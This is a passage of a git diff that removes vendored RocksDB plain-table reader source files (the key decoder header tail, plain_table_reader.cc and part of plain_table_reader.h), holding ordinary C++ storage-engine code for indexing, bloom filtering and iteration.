-                                EncodingType encoding_type,
-                                uint32_t user_key_len,
-                                const SliceTransform* prefix_extractor)
-      : file_reader_(file_info),
-        encoding_type_(encoding_type),
-        prefix_len_(0),
-        fixed_user_key_len_(user_key_len),
-        prefix_extractor_(prefix_extractor),
-        in_prefix_(false) {}
-  // Find the next key.
-  // start: char array where the key starts.
-  // limit: boundary of the char array
-  // parsed_key: the output of the result key
-  // internal_key: if not null, fill with the output of the result key in
-  //               un-parsed format
-  // bytes_read: how many bytes read from start. Output
-  // seekable: whether key can be read from this place. Used when building
-  //           indexes. Output.
-  Status NextKey(uint32_t start_offset, ParsedInternalKey* parsed_key,
-                 Slice* internal_key, Slice* value, uint32_t* bytes_read,
-                 bool* seekable = nullptr);
-
-  Status NextKeyNoValue(uint32_t start_offset, ParsedInternalKey* parsed_key,
-                        Slice* internal_key, uint32_t* bytes_read,
-                        bool* seekable = nullptr);
-
-  PlainTableFileReader file_reader_;
-  EncodingType encoding_type_;
-  uint32_t prefix_len_;
-  uint32_t fixed_user_key_len_;
-  Slice saved_user_key_;
-  IterKey cur_key_;
-  const SliceTransform* prefix_extractor_;
-  bool in_prefix_;
-
- private:
-  Status NextPlainEncodingKey(uint32_t start_offset,
-                              ParsedInternalKey* parsed_key,
-                              Slice* internal_key, uint32_t* bytes_read,
-                              bool* seekable = nullptr);
-  Status NextPrefixEncodingKey(uint32_t start_offset,
-                               ParsedInternalKey* parsed_key,
-                               Slice* internal_key, uint32_t* bytes_read,
-                               bool* seekable = nullptr);
-  Status ReadInternalKey(uint32_t file_offset, uint32_t user_key_size,
-                         ParsedInternalKey* parsed_key, uint32_t* bytes_read,
-                         bool* internal_key_valid, Slice* internal_key);
-  inline Status DecodeSize(uint32_t start_offset,
-                           PlainTableEntryType* entry_type, uint32_t* key_size,
-                           uint32_t* bytes_read);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_reader.cc b/thirdparty/rocksdb/table/plain_table_reader.cc
deleted file mode 100644
index d4d9edb..0000000
--- a/thirdparty/rocksdb/table/plain_table_reader.cc
+++ /dev/null
@@ -1,747 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "table/plain_table_reader.h"
-
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-
-#include "table/block.h"
-#include "table/bloom_block.h"
-#include "table/filter_block.h"
-#include "table/format.h"
-#include "table/internal_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/two_level_iterator.h"
-#include "table/plain_table_factory.h"
-#include "table/plain_table_key_coding.h"
-#include "table/get_context.h"
-
-#include "monitoring/histogram.h"
-#include "monitoring/perf_context_imp.h"
-#include "util/arena.h"
-#include "util/coding.h"
-#include "util/dynamic_bloom.h"
-#include "util/hash.h"
-#include "util/murmurhash.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-namespace {
-
-// Safely getting a uint32_t element from a char array, where, starting from
-// `base`, every 4 bytes are considered as an fixed 32 bit integer.
-inline uint32_t GetFixed32Element(const char* base, size_t offset) {
-  return DecodeFixed32(base + offset * sizeof(uint32_t));
-}
-}  // namespace
-
-// Iterator to iterate IndexedTable
-class PlainTableIterator : public InternalIterator {
- public:
-  explicit PlainTableIterator(PlainTableReader* table, bool use_prefix_seek);
-  ~PlainTableIterator();
-
-  bool Valid() const override;
-
-  void SeekToFirst() override;
-
-  void SeekToLast() override;
-
-  void Seek(const Slice& target) override;
-
-  void SeekForPrev(const Slice& target) override;
-
-  void Next() override;
-
-  void Prev() override;
-
-  Slice key() const override;
-
-  Slice value() const override;
-
-  Status status() const override;
-
- private:
-  PlainTableReader* table_;
-  PlainTableKeyDecoder decoder_;
-  bool use_prefix_seek_;
-  uint32_t offset_;
-  uint32_t next_offset_;
-  Slice key_;
-  Slice value_;
-  Status status_;
-  // No copying allowed
-  PlainTableIterator(const PlainTableIterator&) = delete;
-  void operator=(const Iterator&) = delete;
-};
-
-extern const uint64_t kPlainTableMagicNumber;
-PlainTableReader::PlainTableReader(const ImmutableCFOptions& ioptions,
-                                   unique_ptr<RandomAccessFileReader>&& file,
-                                   const EnvOptions& storage_options,
-                                   const InternalKeyComparator& icomparator,
-                                   EncodingType encoding_type,
-                                   uint64_t file_size,
-                                   const TableProperties* table_properties)
-    : internal_comparator_(icomparator),
-      encoding_type_(encoding_type),
-      full_scan_mode_(false),
-      user_key_len_(static_cast<uint32_t>(table_properties->fixed_key_len)),
-      prefix_extractor_(ioptions.prefix_extractor),
-      enable_bloom_(false),
-      bloom_(6, nullptr),
-      file_info_(std::move(file), storage_options,
-                 static_cast<uint32_t>(table_properties->data_size)),
-      ioptions_(ioptions),
-      file_size_(file_size),
-      table_properties_(nullptr) {}
-
-PlainTableReader::~PlainTableReader() {
-}
-
-Status PlainTableReader::Open(const ImmutableCFOptions& ioptions,
-                              const EnvOptions& env_options,
-                              const InternalKeyComparator& internal_comparator,
-                              unique_ptr<RandomAccessFileReader>&& file,
-                              uint64_t file_size,
-                              unique_ptr<TableReader>* table_reader,
-                              const int bloom_bits_per_key,
-                              double hash_table_ratio, size_t index_sparseness,
-                              size_t huge_page_tlb_size, bool full_scan_mode) {
-  if (file_size > PlainTableIndex::kMaxFileSize) {
-    return Status::NotSupported("File is too large for PlainTableReader!");
-  }
-
-  TableProperties* props = nullptr;
-  auto s = ReadTableProperties(file.get(), file_size, kPlainTableMagicNumber,
-                               ioptions, &props);
-  if (!s.ok()) {
-    return s;
-  }
-
-  assert(hash_table_ratio >= 0.0);
-  auto& user_props = props->user_collected_properties;
-  auto prefix_extractor_in_file = props->prefix_extractor_name;
-
-  if (!full_scan_mode &&
-      !prefix_extractor_in_file.empty() /* old version sst file*/
-      && prefix_extractor_in_file != "nullptr") {
-    if (!ioptions.prefix_extractor) {
-      return Status::InvalidArgument(
-          "Prefix extractor is missing when opening a PlainTable built "
-          "using a prefix extractor");
-    } else if (prefix_extractor_in_file.compare(
-                   ioptions.prefix_extractor->Name()) != 0) {
-      return Status::InvalidArgument(
-          "Prefix extractor given doesn't match the one used to build "
-          "PlainTable");
-    }
-  }
-
-  EncodingType encoding_type = kPlain;
-  auto encoding_type_prop =
-      user_props.find(PlainTablePropertyNames::kEncodingType);
-  if (encoding_type_prop != user_props.end()) {
-    encoding_type = static_cast<EncodingType>(
-        DecodeFixed32(encoding_type_prop->second.c_str()));
-  }
-
-  std::unique_ptr<PlainTableReader> new_reader(new PlainTableReader(
-      ioptions, std::move(file), env_options, internal_comparator,
-      encoding_type, file_size, props));
-
-  s = new_reader->MmapDataIfNeeded();
-  if (!s.ok()) {
-    return s;
-  }
-
-  if (!full_scan_mode) {
-    s = new_reader->PopulateIndex(props, bloom_bits_per_key, hash_table_ratio,
-                                  index_sparseness, huge_page_tlb_size);
-    if (!s.ok()) {
-      return s;
-    }
-  } else {
-    // Flag to indicate it is a full scan mode so that none of the indexes
-    // can be used.
-    new_reader->full_scan_mode_ = true;
-  }
-
-  *table_reader = std::move(new_reader);
-  return s;
-}
-
-void PlainTableReader::SetupForCompaction() {
-}
-
-InternalIterator* PlainTableReader::NewIterator(const ReadOptions& options,
-                                                Arena* arena,
-                                                bool skip_filters) {
-  bool use_prefix_seek = !IsTotalOrderMode() && !options.total_order_seek;
-  if (arena == nullptr) {
-    return new PlainTableIterator(this, use_prefix_seek);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(PlainTableIterator));
-    return new (mem) PlainTableIterator(this, use_prefix_seek);
-  }
-}
-
-Status PlainTableReader::PopulateIndexRecordList(
-    PlainTableIndexBuilder* index_builder, vector<uint32_t>* prefix_hashes) {
-  Slice prev_key_prefix_slice;
-  std::string prev_key_prefix_buf;
-  uint32_t pos = data_start_offset_;
-
-  bool is_first_record = true;
-  Slice key_prefix_slice;
-  PlainTableKeyDecoder decoder(&file_info_, encoding_type_, user_key_len_,
-                               ioptions_.prefix_extractor);
-  while (pos < file_info_.data_end_offset) {
-    uint32_t key_offset = pos;
-    ParsedInternalKey key;
-    Slice value_slice;
-    bool seekable = false;
-    Status s = Next(&decoder, &pos, &key, nullptr, &value_slice, &seekable);
-    if (!s.ok()) {
-      return s;
-    }
-
-    key_prefix_slice = GetPrefix(key);
-    if (enable_bloom_) {
-      bloom_.AddHash(GetSliceHash(key.user_key));
-    } else {
-      if (is_first_record || prev_key_prefix_slice != key_prefix_slice) {
-        if (!is_first_record) {
-          prefix_hashes->push_back(GetSliceHash(prev_key_prefix_slice));
-        }
-        if (file_info_.is_mmap_mode) {
-          prev_key_prefix_slice = key_prefix_slice;
-        } else {
-          prev_key_prefix_buf = key_prefix_slice.ToString();
-          prev_key_prefix_slice = prev_key_prefix_buf;
-        }
-      }
-    }
-
-    index_builder->AddKeyPrefix(GetPrefix(key), key_offset);
-
-    if (!seekable && is_first_record) {
-      return Status::Corruption("Key for a prefix is not seekable");
-    }
-
-    is_first_record = false;
-  }
-
-  prefix_hashes->push_back(GetSliceHash(key_prefix_slice));
-  auto s = index_.InitFromRawData(index_builder->Finish());
-  return s;
-}
-
-void PlainTableReader::AllocateAndFillBloom(int bloom_bits_per_key,
-                                            int num_prefixes,
-                                            size_t huge_page_tlb_size,
-                                            vector<uint32_t>* prefix_hashes) {
-  if (!IsTotalOrderMode()) {
-    uint32_t bloom_total_bits = num_prefixes * bloom_bits_per_key;
-    if (bloom_total_bits > 0) {
-      enable_bloom_ = true;
-      bloom_.SetTotalBits(&arena_, bloom_total_bits, ioptions_.bloom_locality,
-                          huge_page_tlb_size, ioptions_.info_log);
-      FillBloom(prefix_hashes);
-    }
-  }
-}
-
-void PlainTableReader::FillBloom(vector<uint32_t>* prefix_hashes) {
-  assert(bloom_.IsInitialized());
-  for (auto prefix_hash : *prefix_hashes) {
-    bloom_.AddHash(prefix_hash);
-  }
-}
-
-Status PlainTableReader::MmapDataIfNeeded() {
-  if (file_info_.is_mmap_mode) {
-    // Get mmapped memory.
-    return file_info_.file->Read(0, file_size_, &file_info_.file_data, nullptr);
-  }
-  return Status::OK();
-}
-
-Status PlainTableReader::PopulateIndex(TableProperties* props,
-                                       int bloom_bits_per_key,
-                                       double hash_table_ratio,
-                                       size_t index_sparseness,
-                                       size_t huge_page_tlb_size) {
-  assert(props != nullptr);
-  table_properties_.reset(props);
-
-  BlockContents index_block_contents;
-  Status s = ReadMetaBlock(file_info_.file.get(), nullptr /* prefetch_buffer */,
-                           file_size_, kPlainTableMagicNumber, ioptions_,
-                           PlainTableIndexBuilder::kPlainTableIndexBlock,
-                           &index_block_contents);
-
-  bool index_in_file = s.ok();
-
-  BlockContents bloom_block_contents;
-  bool bloom_in_file = false;
-  // We only need to read the bloom block if index block is in file.
-  if (index_in_file) {
-    s = ReadMetaBlock(file_info_.file.get(), nullptr /* prefetch_buffer */,
-                      file_size_, kPlainTableMagicNumber, ioptions_,
-                      BloomBlockBuilder::kBloomBlock, &bloom_block_contents);
-    bloom_in_file = s.ok() && bloom_block_contents.data.size() > 0;
-  }
-
-  Slice* bloom_block;
-  if (bloom_in_file) {
-    // If bloom_block_contents.allocation is not empty (which will be the case
-    // for non-mmap mode), it holds the alloated memory for the bloom block.
-    // It needs to be kept alive to keep `bloom_block` valid.
-    bloom_block_alloc_ = std::move(bloom_block_contents.allocation);
-    bloom_block = &bloom_block_contents.data;
-  } else {
-    bloom_block = nullptr;
-  }
-
-  Slice* index_block;
-  if (index_in_file) {
-    // If index_block_contents.allocation is not empty (which will be the case
-    // for non-mmap mode), it holds the alloated memory for the index block.
-    // It needs to be kept alive to keep `index_block` valid.
-    index_block_alloc_ = std::move(index_block_contents.allocation);
-    index_block = &index_block_contents.data;
-  } else {
-    index_block = nullptr;
-  }
-
-  if ((ioptions_.prefix_extractor == nullptr) &&
-      (hash_table_ratio != 0)) {
-    // ioptions.prefix_extractor is requried for a hash-based look-up.
-    return Status::NotSupported(
-        "PlainTable requires a prefix extractor enable prefix hash mode.");
-  }
-
-  // First, read the whole file, for every kIndexIntervalForSamePrefixKeys rows
-  // for a prefix (starting from the first one), generate a record of (hash,
-  // offset) and append it to IndexRecordList, which is a data structure created
-  // to store them.
-
-  if (!index_in_file) {
-    // Allocate bloom filter here for total order mode.
-    if (IsTotalOrderMode()) {
-      uint32_t num_bloom_bits =
-          static_cast<uint32_t>(table_properties_->num_entries) *
-          bloom_bits_per_key;
-      if (num_bloom_bits > 0) {
-        enable_bloom_ = true;
-        bloom_.SetTotalBits(&arena_, num_bloom_bits, ioptions_.bloom_locality,
-                            huge_page_tlb_size, ioptions_.info_log);
-      }
-    }
-  } else if (bloom_in_file) {
-    enable_bloom_ = true;
-    auto num_blocks_property = props->user_collected_properties.find(
-        PlainTablePropertyNames::kNumBloomBlocks);
-
-    uint32_t num_blocks = 0;
-    if (num_blocks_property != props->user_collected_properties.end()) {
-      Slice temp_slice(num_blocks_property->second);
-      if (!GetVarint32(&temp_slice, &num_blocks)) {
-        num_blocks = 0;
-      }
-    }
-    // cast away const qualifier, because bloom_ won't be changed
-    bloom_.SetRawData(
-        const_cast<unsigned char*>(
-            reinterpret_cast<const unsigned char*>(bloom_block->data())),
-        static_cast<uint32_t>(bloom_block->size()) * 8, num_blocks);
-  } else {
-    // Index in file but no bloom in file. Disable bloom filter in this case.
-    enable_bloom_ = false;
-    bloom_bits_per_key = 0;
-  }
-
-  PlainTableIndexBuilder index_builder(&arena_, ioptions_, index_sparseness,
-                                       hash_table_ratio, huge_page_tlb_size);
-
-  std::vector<uint32_t> prefix_hashes;
-  if (!index_in_file) {
-    s = PopulateIndexRecordList(&index_builder, &prefix_hashes);
-    if (!s.ok()) {
-      return s;
-    }
-  } else {
-    s = index_.InitFromRawData(*index_block);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  if (!index_in_file) {
-    // Calculated bloom filter size and allocate memory for
-    // bloom filter based on the number of prefixes, then fill it.
-    AllocateAndFillBloom(bloom_bits_per_key, index_.GetNumPrefixes(),
-                         huge_page_tlb_size, &prefix_hashes);
-  }
-
-  // Fill two table properties.
-  if (!index_in_file) {
-    props->user_collected_properties["plain_table_hash_table_size"] =
-        ToString(index_.GetIndexSize() * PlainTableIndex::kOffsetLen);
-    props->user_collected_properties["plain_table_sub_index_size"] =
-        ToString(index_.GetSubIndexSize());
-  } else {
-    props->user_collected_properties["plain_table_hash_table_size"] =
-        ToString(0);
-    props->user_collected_properties["plain_table_sub_index_size"] =
-        ToString(0);
-  }
-
-  return Status::OK();
-}
-
-Status PlainTableReader::GetOffset(PlainTableKeyDecoder* decoder,
-                                   const Slice& target, const Slice& prefix,
-                                   uint32_t prefix_hash, bool& prefix_matched,
-                                   uint32_t* offset) const {
-  prefix_matched = false;
-  uint32_t prefix_index_offset;
-  auto res = index_.GetOffset(prefix_hash, &prefix_index_offset);
-  if (res == PlainTableIndex::kNoPrefixForBucket) {
-    *offset = file_info_.data_end_offset;
-    return Status::OK();
-  } else if (res == PlainTableIndex::kDirectToFile) {
-    *offset = prefix_index_offset;
-    return Status::OK();
-  }
-
-  // point to sub-index, need to do a binary search
-  uint32_t upper_bound;
-  const char* base_ptr =
-      index_.GetSubIndexBasePtrAndUpperBound(prefix_index_offset, &upper_bound);
-  uint32_t low = 0;
-  uint32_t high = upper_bound;
-  ParsedInternalKey mid_key;
-  ParsedInternalKey parsed_target;
-  if (!ParseInternalKey(target, &parsed_target)) {
-    return Status::Corruption(Slice());
-  }
-
-  // The key is between [low, high). Do a binary search between it.
-  while (high - low > 1) {
-    uint32_t mid = (high + low) / 2;
-    uint32_t file_offset = GetFixed32Element(base_ptr, mid);
-    uint32_t tmp;
-    Status s = decoder->NextKeyNoValue(file_offset, &mid_key, nullptr, &tmp);
-    if (!s.ok()) {
-      return s;
-    }
-    int cmp_result = internal_comparator_.Compare(mid_key, parsed_target);
-    if (cmp_result < 0) {
-      low = mid;
-    } else {
-      if (cmp_result == 0) {
-        // Happen to have found the exact key or target is smaller than the
-        // first key after base_offset.
-        prefix_matched = true;
-        *offset = file_offset;
-        return Status::OK();
-      } else {
-        high = mid;
-      }
-    }
-  }
-  // Both of the key at the position low or low+1 could share the same
-  // prefix as target. We need to rule out one of them to avoid to go
-  // to the wrong prefix.
-  ParsedInternalKey low_key;
-  uint32_t tmp;
-  uint32_t low_key_offset = GetFixed32Element(base_ptr, low);
-  Status s = decoder->NextKeyNoValue(low_key_offset, &low_key, nullptr, &tmp);
-  if (!s.ok()) {
-    return s;
-  }
-
-  if (GetPrefix(low_key) == prefix) {
-    prefix_matched = true;
-    *offset = low_key_offset;
-  } else if (low + 1 < upper_bound) {
-    // There is possible a next prefix, return it
-    prefix_matched = false;
-    *offset = GetFixed32Element(base_ptr, low + 1);
-  } else {
-    // target is larger than a key of the last prefix in this bucket
-    // but with a different prefix. Key does not exist.
-    *offset = file_info_.data_end_offset;
-  }
-  return Status::OK();
-}
-
-bool PlainTableReader::MatchBloom(uint32_t hash) const {
-  if (!enable_bloom_) {
-    return true;
-  }
-
-  if (bloom_.MayContainHash(hash)) {
-    PERF_COUNTER_ADD(bloom_sst_hit_count, 1);
-    return true;
-  } else {
-    PERF_COUNTER_ADD(bloom_sst_miss_count, 1);
-    return false;
-  }
-}
-
-Status PlainTableReader::Next(PlainTableKeyDecoder* decoder, uint32_t* offset,
-                              ParsedInternalKey* parsed_key,
-                              Slice* internal_key, Slice* value,
-                              bool* seekable) const {
-  if (*offset == file_info_.data_end_offset) {
-    *offset = file_info_.data_end_offset;
-    return Status::OK();
-  }
-
-  if (*offset > file_info_.data_end_offset) {
-    return Status::Corruption("Offset is out of file size");
-  }
-
-  uint32_t bytes_read;
-  Status s = decoder->NextKey(*offset, parsed_key, internal_key, value,
-                              &bytes_read, seekable);
-  if (!s.ok()) {
-    return s;
-  }
-  *offset = *offset + bytes_read;
-  return Status::OK();
-}
-
-void PlainTableReader::Prepare(const Slice& target) {
-  if (enable_bloom_) {
-    uint32_t prefix_hash = GetSliceHash(GetPrefix(target));
-    bloom_.Prefetch(prefix_hash);
-  }
-}
-
-Status PlainTableReader::Get(const ReadOptions& ro, const Slice& target,
-                             GetContext* get_context, bool skip_filters) {
-  // Check bloom filter first.
-  Slice prefix_slice;
-  uint32_t prefix_hash;
-  if (IsTotalOrderMode()) {
-    if (full_scan_mode_) {
-      status_ =
-          Status::InvalidArgument("Get() is not allowed in full scan mode.");
-    }
-    // Match whole user key for bloom filter check.
-    if (!MatchBloom(GetSliceHash(GetUserKey(target)))) {
-      return Status::OK();
-    }
-    // in total order mode, there is only one bucket 0, and we always use empty
-    // prefix.
-    prefix_slice = Slice();
-    prefix_hash = 0;
-  } else {
-    prefix_slice = GetPrefix(target);
-    prefix_hash = GetSliceHash(prefix_slice);
-    if (!MatchBloom(prefix_hash)) {
-      return Status::OK();
-    }
-  }
-  uint32_t offset;
-  bool prefix_match;
-  PlainTableKeyDecoder decoder(&file_info_, encoding_type_, user_key_len_,
-                               ioptions_.prefix_extractor);
-  Status s = GetOffset(&decoder, target, prefix_slice, prefix_hash,
-                       prefix_match, &offset);
-
-  if (!s.ok()) {
-    return s;
-  }
-  ParsedInternalKey found_key;
-  ParsedInternalKey parsed_target;
-  if (!ParseInternalKey(target, &parsed_target)) {
-    return Status::Corruption(Slice());
-  }
-  Slice found_value;
-  while (offset < file_info_.data_end_offset) {
-    s = Next(&decoder, &offset, &found_key, nullptr, &found_value);
-    if (!s.ok()) {
-      return s;
-    }
-    if (!prefix_match) {
-      // Need to verify prefix for the first key found if it is not yet
-      // checked.
-      if (GetPrefix(found_key) != prefix_slice) {
-        return Status::OK();
-      }
-      prefix_match = true;
-    }
-    // TODO(ljin): since we know the key comparison result here,
-    // can we enable the fast path?
-    if (internal_comparator_.Compare(found_key, parsed_target) >= 0) {
-      if (!get_context->SaveValue(found_key, found_value)) {
-        break;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& key) {
-  return 0;
-}
-
-PlainTableIterator::PlainTableIterator(PlainTableReader* table,
-                                       bool use_prefix_seek)
-    : table_(table),
-      decoder_(&table_->file_info_, table_->encoding_type_,
-               table_->user_key_len_, table_->prefix_extractor_),
-      use_prefix_seek_(use_prefix_seek) {
-  next_offset_ = offset_ = table_->file_info_.data_end_offset;
-}
-
-PlainTableIterator::~PlainTableIterator() {
-}
-
-bool PlainTableIterator::Valid() const {
-  return offset_ < table_->file_info_.data_end_offset &&
-         offset_ >= table_->data_start_offset_;
-}
-
-void PlainTableIterator::SeekToFirst() {
-  next_offset_ = table_->data_start_offset_;
-  if (next_offset_ >= table_->file_info_.data_end_offset) {
-    next_offset_ = offset_ = table_->file_info_.data_end_offset;
-  } else {
-    Next();
-  }
-}
-
-void PlainTableIterator::SeekToLast() {
-  assert(false);
-  status_ = Status::NotSupported("SeekToLast() is not supported in PlainTable");
-}
-
-void PlainTableIterator::Seek(const Slice& target) {
-  if (use_prefix_seek_ != !table_->IsTotalOrderMode()) {
-    // This check is done here instead of NewIterator() to permit creating an
-    // iterator with total_order_seek = true even if we won't be able to Seek()
-    // it. This is needed for compaction: it creates iterator with
-    // total_order_seek = true but usually never does Seek() on it,
-    // only SeekToFirst().
-    status_ =
-        Status::InvalidArgument(
-          "total_order_seek not implemented for PlainTable.");
-    offset_ = next_offset_ = table_->file_info_.data_end_offset;
-    return;
-  }
-
-  // If the user doesn't set prefix seek option and we are not able to do a
-  // total Seek(). assert failure.
-  if (table_->IsTotalOrderMode()) {
-    if (table_->full_scan_mode_) {
-      status_ =
-          Status::InvalidArgument("Seek() is not allowed in full scan mode.");
-      offset_ = next_offset_ = table_->file_info_.data_end_offset;
-      return;
-    } else if (table_->GetIndexSize() > 1) {
-      assert(false);
-      status_ = Status::NotSupported(
-          "PlainTable cannot issue non-prefix seek unless in total order "
-          "mode.");
-      offset_ = next_offset_ = table_->file_info_.data_end_offset;
-      return;
-    }
-  }
-
-  Slice prefix_slice = table_->GetPrefix(target);
-  uint32_t prefix_hash = 0;
-  // Bloom filter is ignored in total-order mode.
-  if (!table_->IsTotalOrderMode()) {
-    prefix_hash = GetSliceHash(prefix_slice);
-    if (!table_->MatchBloom(prefix_hash)) {
-      offset_ = next_offset_ = table_->file_info_.data_end_offset;
-      return;
-    }
-  }
-  bool prefix_match;
-  status_ = table_->GetOffset(&decoder_, target, prefix_slice, prefix_hash,
-                              prefix_match, &next_offset_);
-  if (!status_.ok()) {
-    offset_ = next_offset_ = table_->file_info_.data_end_offset;
-    return;
-  }
-
-  if (next_offset_ < table_->file_info_.data_end_offset) {
-    for (Next(); status_.ok() && Valid(); Next()) {
-      if (!prefix_match) {
-        // Need to verify the first key's prefix
-        if (table_->GetPrefix(key()) != prefix_slice) {
-          offset_ = next_offset_ = table_->file_info_.data_end_offset;
-          break;
-        }
-        prefix_match = true;
-      }
-      if (table_->internal_comparator_.Compare(key(), target) >= 0) {
-        break;
-      }
-    }
-  } else {
-    offset_ = table_->file_info_.data_end_offset;
-  }
-}
-
-void PlainTableIterator::SeekForPrev(const Slice& target) {
-  assert(false);
-  status_ =
-      Status::NotSupported("SeekForPrev() is not supported in PlainTable");
-}
-
-void PlainTableIterator::Next() {
-  offset_ = next_offset_;
-  if (offset_ < table_->file_info_.data_end_offset) {
-    Slice tmp_slice;
-    ParsedInternalKey parsed_key;
-    status_ =
-        table_->Next(&decoder_, &next_offset_, &parsed_key, &key_, &value_);
-    if (!status_.ok()) {
-      offset_ = next_offset_ = table_->file_info_.data_end_offset;
-    }
-  }
-}
-
-void PlainTableIterator::Prev() {
-  assert(false);
-}
-
-Slice PlainTableIterator::key() const {
-  assert(Valid());
-  return key_;
-}
-
-Slice PlainTableIterator::value() const {
-  assert(Valid());
-  return value_;
-}
-
-Status PlainTableIterator::status() const {
-  return status_;
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_reader.h b/thirdparty/rocksdb/table/plain_table_reader.h
deleted file mode 100644
index 6bf8da2..0000000
--- a/thirdparty/rocksdb/table/plain_table_reader.h
+++ /dev/null
@@ -1,234 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include <unordered_map>
-#include <memory>
-#include <vector>
-#include <string>
-#include <stdint.h>
-
-#include "db/dbformat.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "table/table_reader.h"
-#include "table/plain_table_factory.h"
-#include "table/plain_table_index.h"
-#include "util/arena.h"
-#include "util/dynamic_bloom.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Block;
-struct BlockContents;
-class BlockHandle;
-class Footer;
-struct Options;
-class RandomAccessFile;
-struct ReadOptions;
-class TableCache;
-class TableReader;
-class InternalKeyComparator;
-class PlainTableKeyDecoder;
-class GetContext;
-class InternalIterator;
-
-using std::unique_ptr;
-using std::unordered_map;
-using std::vector;
-extern const uint32_t kPlainTableVariableLength;
-
-struct PlainTableReaderFileInfo {
-  bool is_mmap_mode;
-  Slice file_data;
-  uint32_t data_end_offset;
-  unique_ptr<RandomAccessFileReader> file;
-
-  PlainTableReaderFileInfo(unique_ptr<RandomAccessFileReader>&& _file,
-                           const EnvOptions& storage_options,
-                           uint32_t _data_size_offset)
-      : is_mmap_mode(storage_options.use_mmap_reads),
-        data_end_offset(_data_size_offset),
-        file(std::move(_file)) {}
-};
-
-// Based on following output file format shown in plain_table_factory.h
-// When opening the output file, IndexedTableReader creates a hash table
-// from key prefixes to offset of the output file. IndexedTable will decide
-// whether it points to the data offset of the first key with the key prefix
-// or the offset of it. If there are too many keys share this prefix, it will
-// create a binary search-able index from the suffix to offset on disk.
-//
-// The implementation of IndexedTableReader requires output file is mmaped
-class PlainTableReader: public TableReader {
- public:
-  static Status Open(const ImmutableCFOptions& ioptions,
-                     const EnvOptions& env_options,
-                     const InternalKeyComparator& internal_comparator,
-                     unique_ptr<RandomAccessFileReader>&& file,
-                     uint64_t file_size, unique_ptr<TableReader>* table,
-                     const int bloom_bits_per_key, double hash_table_ratio,
-                     size_t index_sparseness, size_t huge_page_tlb_size,
-                     bool full_scan_mode);
-
-  InternalIterator* NewIterator(const ReadOptions&,
-                                Arena* arena = nullptr,
-                                bool skip_filters = false) override;
-
-  void Prepare(const Slice& target) override;
-
-  Status Get(const ReadOptions&, const Slice& key, GetContext* get_context,
-             bool skip_filters = false) override;
-
-  uint64_t ApproximateOffsetOf(const Slice& key) override;
-
-  uint32_t GetIndexSize() const { return index_.GetIndexSize(); }
-  void SetupForCompaction() override;
-
-  std::shared_ptr<const TableProperties> GetTableProperties() const override {
-    return table_properties_;
-  }
-
-  virtual size_t ApproximateMemoryUsage() const override {
-    return arena_.MemoryAllocatedBytes();
-  }
-
-  PlainTableReader(const ImmutableCFOptions& ioptions,
-                   unique_ptr<RandomAccessFileReader>&& file,
-                   const EnvOptions& env_options,
-                   const InternalKeyComparator& internal_comparator,
-                   EncodingType encoding_type, uint64_t file_size,
-                   const TableProperties* table_properties);
-  virtual ~PlainTableReader();
-
- protected:
-  // Check bloom filter to see whether it might contain this prefix.
-  // The hash of the prefix is given, since it can be reused for index lookup
-  // too.
-  virtual bool MatchBloom(uint32_t hash) const;
-
-  // PopulateIndex() builds index of keys. It must be called before any query
-  // to the table.
-  //
-  // props: the table properties object that need to be stored. Ownership of
-  //        the object will be passed.
-  //
-
-  Status PopulateIndex(TableProperties* props, int bloom_bits_per_key,
-                       double hash_table_ratio, size_t index_sparseness,
-                       size_t huge_page_tlb_size);
-
-  Status MmapDataIfNeeded();
-
- private:
-  const InternalKeyComparator internal_comparator_;
-  EncodingType encoding_type_;
-  // represents plain table's current status.
-  Status status_;
-
-  PlainTableIndex index_;
-  bool full_scan_mode_;
-
-  // data_start_offset_ and data_end_offset_ defines the range of the
-  // sst file that stores data.
-  const uint32_t data_start_offset_ = 0;
-  const uint32_t user_key_len_;
-  const SliceTransform* prefix_extractor_;
-
-  static const size_t kNumInternalBytes = 8;
-
-  // Bloom filter is used to rule out non-existent key
-  bool enable_bloom_;
-  DynamicBloom bloom_;
-  PlainTableReaderFileInfo file_info_;
-  Arena arena_;
-  std::unique_ptr<char[]> index_block_alloc_;
-  std::unique_ptr<char[]> bloom_block_alloc_;
-
-  const ImmutableCFOptions& ioptions_;
-  uint64_t file_size_;
-  std::shared_ptr<const TableProperties> table_properties_;
-
-  bool IsFixedLength() const {
-    return user_key_len_ != kPlainTableVariableLength;
-  }
-
-  size_t GetFixedInternalKeyLength() const {
-    return user_key_len_ + kNumInternalBytes;
-  }
-
-  Slice GetPrefix(const Slice& target) const {
-    assert(target.size() >= 8);  // target is internal key
-    return GetPrefixFromUserKey(GetUserKey(target));
-  }
-
-  Slice GetPrefix(const ParsedInternalKey& target) const {
-    return GetPrefixFromUserKey(target.user_key);
-  }
-
-  Slice GetUserKey(const Slice& key) const {
-    return Slice(key.data(), key.size() - 8);
-  }
-
-  Slice GetPrefixFromUserKey(const Slice& user_key) const {
-    if (!IsTotalOrderMode()) {
-      return prefix_extractor_->Transform(user_key);
-    } else {
